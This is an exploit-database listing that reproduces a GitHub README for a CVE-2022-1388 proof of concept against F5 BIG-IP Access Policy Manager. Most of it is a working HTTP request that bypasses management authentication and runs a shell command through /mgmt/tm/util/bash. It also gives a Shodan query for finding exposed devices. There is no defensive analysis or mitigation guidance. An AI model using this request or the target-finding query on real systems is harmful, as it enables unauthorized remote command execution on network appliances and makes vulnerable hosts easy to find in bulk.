Sploitus

Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager

githubexploit · 2022-05-09

Exploit Code

README24 lines
## https://sploitus.com/exploit?id=DE6C74CF-3566-5236-BB5A-4734B971BD9C
**CVE-2022-1388** **EXPLOIT** **POC** **[F5 BIG IP]**

```
POST /mgmt/tm/util/bash HTTP/1.1
Host: REDACTED:8083
Content-Length: 45
Connection: Keep-Alive,X-F5-Auth-Token
Cache-Control: max-age=0
X-F5-Auth-Token: SherlockSecure
Content-Type: application/json
Authorization: Basic YWRtaW46aG9yaXpvbjM=

{
"command":"run",
"utilCmdArgs":"-c id"
}
```

![Poc](https://i.imgur.com/c83ch8h.png)


**SHODAN QUERY**
 ```http.title:"BIG-IP®-+Redirect" +"Server"```